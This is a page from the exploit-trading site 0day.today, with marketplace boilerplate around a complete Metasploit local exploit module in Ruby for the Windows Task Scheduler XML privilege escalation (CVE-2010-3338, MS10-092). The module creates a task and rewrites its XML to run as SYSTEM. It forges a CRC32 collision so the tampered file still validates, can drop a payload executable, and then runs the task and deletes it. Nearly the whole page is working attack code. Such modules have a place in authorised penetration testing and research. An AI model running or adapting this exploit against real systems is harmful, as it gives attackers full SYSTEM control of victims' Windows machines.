0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Windows Escalate Task Scheduler XML Privilege Escalation
[##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/post/common'
require 'rex'
require 'zlib'
class Metasploit3 < Msf::Exploit::Local
include Msf::Exploit::EXE
include Msf::Post::Common
include Msf::Post::File
def initialize(info={})
super(update_info(info, {
'Name' => 'Windows Escalate Task Scheduler XML Privilege Escalation',
'Description' => %q{
This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
When processing task files, the Windows Task Scheduler only uses a CRC32
checksum to validate that the file has not been tampered with. Also, In a default
configuration, normal users can read and write the task files that they have
created. By modifying the task file and creating a CRC32 collision, an attacker
can execute arbitrary commands with SYSTEM privileges.
NOTE: Thanks to webDEViL for the information about disable/enable.
},
'License' => MSF_LICENSE,
'Author' => [ 'jduck' ],
'Version' => '$Revision$',
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
[ 'Windows Vista, 7, and 2008', {} ],
],
'References' =>
[
[ 'OSVDB', '68518' ],
[ 'CVE', '2010-3338' ],
[ 'BID', '44357' ],
[ 'MSB', 'MS10-092' ],
[ 'EDB', 15589 ]
],
'DisclosureDate'=> 'Sep 13 2010',
'DefaultTarget' => 0
}))
register_options([
OptString.new("CMD", [ false, "Command to execute instead of a payload" ]),
OptString.new("TASKNAME", [ false, "A name for the created task (default random)" ]),
])
end
def check
vuln = false
winver = sysinfo["OS"]
affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008' ]
affected.each { |v|
if winver.include? v
vuln = true
break
end
}
if not vuln
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Appears
end
def exploit
if sysinfo["Architecture"] =~ /wow64/i
#
# WOW64 Filesystem Redirection prevents us opening the file directly. To make matters
# worse, meterpreter/railgun creates things in a new thread, making it much more
# difficult to disable via Wow64EnableWow64FsRedirection. Until we can get around this,
# offer a workaround and error out.
#
print_error("Running against via WOW64 is not supported, try using an x64 meterpreter...")
return
end
if check == Exploit::CheckCode::Safe
print_error("#{winver} is not vulnerable.")
return
end
taskname = datastore["TASKNAME"] || nil
cmd = datastore["CMD"] || nil
upload_fn = nil
tempdir = session.fs.file.expand_path("%TEMP%")
if not cmd
# Get the exe payload.
exe = generate_payload_exe
#and placing it on the target in %TEMP%
tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
cmd = tempdir + "\\" + tempexename + ".exe"
print_status("Preparing payload at #{cmd}")
write_file(cmd, exe)
else
print_status("Using command: #{cmd}")
end
#
# Create a new task to do our bidding, but make sure it doesn't run.
#
taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8))
sysdir = session.fs.file.expand_path("%SystemRoot%")
taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}"
print_status("Creating task: #{taskname}")
cmdline = "schtasks.exe /create /tn #{taskname} /tr \"#{cmd}\" /sc monthly /f"
# print_debug("Will Execute:\n\t#{cmdline}")
exec_schtasks(cmdline, "create the task")
#
# Read the contents of the newly creates task file
#
content = read_task_file(taskname, taskfile)
#
# Double-check that we got what we expect.
#
if content[0,2] != "\xff\xfe"
#
# Convert to unicode, since it isn't already
#
content = content.unpack('C*').pack('v*')
else
#
# NOTE: we strip the BOM here to exclude it from the crc32 calculation
#
content = content[2,content.length]
end
#
# Record the crc32 for later calculations
#
old_crc32 = crc32(content)
print_status("Original CRC32: 0x%x" % old_crc32)
#
# Convert the file contents from unicode
#
content = content.unpack('v*').pack('C*')
#
# Mangle the contents to now run with SYSTEM privileges
#
content.gsub!('LeastPrivilege', 'HighestAvailable')
content.gsub!(/<UserId>.*<\/UserId>/, '<UserId>S-1-5-18</UserId>')
content.gsub!(/<Author>.*<\/Author>/, '<Author>S-1-5-18</Author>')
#content.gsub!('<LogonType>InteractiveToken</LogonType>', '<LogonType>Password</LogonType>')
content.gsub!('Principal id="Author"', 'Principal id="LocalSystem"')
content.gsub!('Actions Context="Author"', 'Actions Context="LocalSystem"')
content << "<!-- ZZ -->"
#
# Convert it back to unicode
#
content = Rex::Text.to_unicode(content)
#
# Fix it so the CRC matches again
#
fix_crc32(content, old_crc32)
new_crc32 = crc32(content)
print_status("Final CRC32: 0x%x" % new_crc32)
#
# Write the new content back
#
print_status("Writing our modified content back...")
fd = session.fs.file.new(taskfile, "wb")
fd.write "\xff\xfe" + content
fd.close
#
# Validate our results
#
print_status("Validating task: #{taskname}")
exec_schtasks("schtasks.exe /query /tn #{taskname}", "validate the task")
#
# Run the task :-)
#
print_status("Disabling the task...")
exec_schtasks("schtasks.exe /change /tn #{taskname} /disable", "disable the task")
print_status("Enabling the task...")
exec_schtasks("schtasks.exe /change /tn #{taskname} /enable", "enable the task")
print_status("Executing the task...")
exec_schtasks("schtasks.exe /run /tn #{taskname}", "run the task")
#
# And delete it.
#
print_status("Deleting the task...")
exec_schtasks("schtasks.exe /delete /f /tn #{taskname}", "delete the task")
end
def crc32(data)
table = Zlib.crc_table
crc = 0xffffffff
data.unpack('C*').each { |b|
crc = table[(crc & 0xff) ^ b] ^ (crc >> 8)
}
crc
end
def fix_crc32(data, old_crc)
#
# CRC32 stuff from ESET (presumably reversed from Stuxnet, which was presumably
# reversed from Microsoft's code)
#
bwd_table = [
0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82,
0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF,
0xB61B38CB, 0x6D6A3E8A, 0xDB883208, 0x00F93449,
0xDA7A5A9A, 0x010B5CDB, 0xB7E95059, 0x6C985618,
0x015C4F1C, 0xDA2D495D, 0x6CCF45DF, 0xB7BE439E,
0xB74777D7, 0x6C367196, 0xDAD47D14, 0x01A57B55,
0x6C616251, 0xB7106410, 0x01F26892, 0xDA836ED3,
0x6F85B375, 0xB4F4B534, 0x0216B9B6, 0xD967BFF7,
0xB4A3A6F3, 0x6FD2A0B2, 0xD930AC30, 0x0241AA71,
0x02B89E38, 0xD9C99879, 0x6F2B94FB, 0xB45A92BA,
0xD99E8BBE, 0x02EF8DFF, 0xB40D817D, 0x6F7C873C,
0xB5FFE9EF, 0x6E8EEFAE, 0xD86CE32C, 0x031DE56D,
0x6ED9FC69, 0xB5A8FA28, 0x034AF6AA, 0xD83BF0EB,
0xD8C2C4A2, 0x03B3C2E3, 0xB551CE61, 0x6E20C820,
0x03E4D124, 0xD895D765, 0x6E77DBE7, 0xB506DDA6,
0xDF0B66EA, 0x047A60AB, 0xB2986C29, 0x69E96A68,
0x042D736C, 0xDF5C752D, 0x69BE79AF, 0xB2CF7FEE,
0xB2364BA7, 0x69474DE6, 0xDFA54164, 0x04D44725,
0x69105E21, 0xB2615860, 0x048354E2, 0xDFF252A3,
0x05713C70, 0xDE003A31, 0x68E236B3, 0xB39330F2,
0xDE5729F6, 0x05262FB7, 0xB3C42335, 0x68B52574,
0x684C113D, 0xB33D177C, 0x05DF1BFE, 0xDEAE1DBF,
0xB36A04BB, 0x681B02FA, 0xDEF90E78, 0x05880839,
0xB08ED59F, 0x6BFFD3DE, 0xDD1DDF5C, 0x066CD91D,
0x6BA8C019, 0xB0D9C658, 0x063BCADA, 0xDD4ACC9B,
0xDDB3F8D2, 0x06C2FE93, 0xB020F211, 0x6B51F450,
0x0695ED54, 0xDDE4EB15, 0x6B06E797, 0xB077E1D6,
0x6AF48F05, 0xB1858944, 0x076785C6, 0xDC168387,
0xB1D29A83, 0x6AA39CC2, 0xDC419040, 0x07309601,
0x07C9A248, 0xDCB8A409, 0x6A5AA88B, 0xB12BAECA,
0xDCEFB7CE, 0x079EB18F, 0xB17CBD0D, 0x6A0DBB4C,
0x6567CB95, 0xBE16CDD4, 0x08F4C156, 0xD385C717,
0xBE41DE13, 0x6530D852, 0xD3D2D4D0, 0x08A3D291,
0x085AE6D8, 0xD32BE099, 0x65C9EC1B, 0xBEB8EA5A,
0xD37CF35E, 0x080DF51F, 0xBEEFF99D, 0x659EFFDC,
0xBF1D910F, 0x646C974E, 0xD28E9BCC, 0x09FF9D8D,
0x643B8489, 0xBF4A82C8, 0x09A88E4A, 0xD2D9880B,
0xD220BC42, 0x0951BA03, 0xBFB3B681, 0x64C2B0C0,
0x0906A9C4, 0xD277AF85, 0x6495A307, 0xBFE4A546,
0x0AE278E0, 0xD1937EA1, 0x67717223, 0xBC007462,
0xD1C46D66, 0x0AB56B27, 0xBC5767A5, 0x672661E4,
0x67DF55AD, 0xBCAE53EC, 0x0A4C5F6E, 0xD13D592F,
0xBCF9402B, 0x6788466A, 0xD16A4AE8, 0x0A1B4CA9,
0xD098227A, 0x0BE9243B, 0xBD0B28B9, 0x667A2EF8,
0x0BBE37FC, 0xD0CF31BD, 0x662D3D3F, 0xBD5C3B7E,
0xBDA50F37, 0x66D40976, 0xD03605F4, 0x0B4703B5,
0x66831AB1, 0xBDF21CF0, 0x0B101072, 0xD0611633,
0xBA6CAD7F, 0x611DAB3E, 0xD7FFA7BC, 0x0C8EA1FD,
0x614AB8F9, 0xBA3BBEB8, 0x0CD9B23A, 0xD7A8B47B,
0xD7518032, 0x0C208673, 0xBAC28AF1, 0x61B38CB0,
0x0C7795B4, 0xD70693F5, 0x61E49F77, 0xBA959936,
0x6016F7E5, 0xBB67F1A4, 0x0D85FD26, 0xD6F4FB67,
0xBB30E263, 0x6041E422, 0xD6A3E8A0, 0x0DD2EEE1,
0x0D2BDAA8, 0xD65ADCE9, 0x60B8D06B, 0xBBC9D62A,
0xD60DCF2E, 0x0D7CC96F, 0xBB9EC5ED, 0x60EFC3AC,
0xD5E91E0A, 0x0E98184B, 0xB87A14C9, 0x630B1288,
0x0ECF0B8C, 0xD5BE0DCD, 0x635C014F, 0xB82D070E,
0xB8D43347, 0x63A53506, 0xD5473984, 0x0E363FC5,
0x63F226C1, 0xB8832080, 0x0E612C02, 0xD5102A43,
0x0F934490, 0xD4E242D1, 0x62004E53, 0xB9714812,
0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F,
0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9
]
crc = crc32(data[0, data.length - 12])
data[-12, 4] = [crc].pack('V')
data[-12, 12].unpack('C*').reverse.each { |b|
old_crc = ((old_crc << 8) ^ bwd_table[old_crc >> 24] ^ b) & 0xffffffff
}
data[-12, 4] = [old_crc].pack('V')
end
def exec_schtasks(cmdline, purpose)
cmdline = "/c #{cmdline.strip} && echo SCHELEVATOR"
lns = cmd_exec('cmd.exe', cmdline)
success = false
lns.each_line { |ln|
ln.chomp!
if ln =~ /^SUCCESS\:\s/
success = true
print_status(ln)
else
print_status(ln)
end
}
end
def read_task_file(taskname, taskfile)
print_status("Reading the task file contents from #{taskfile}...")
# Can't read the file directly on 2008?
content = ''
fd = session.fs.file.new(taskfile, "rb")
until fd.eof?
content << fd.read
end
fd.close
content
end
end
# 0day.today [2024-11-15] #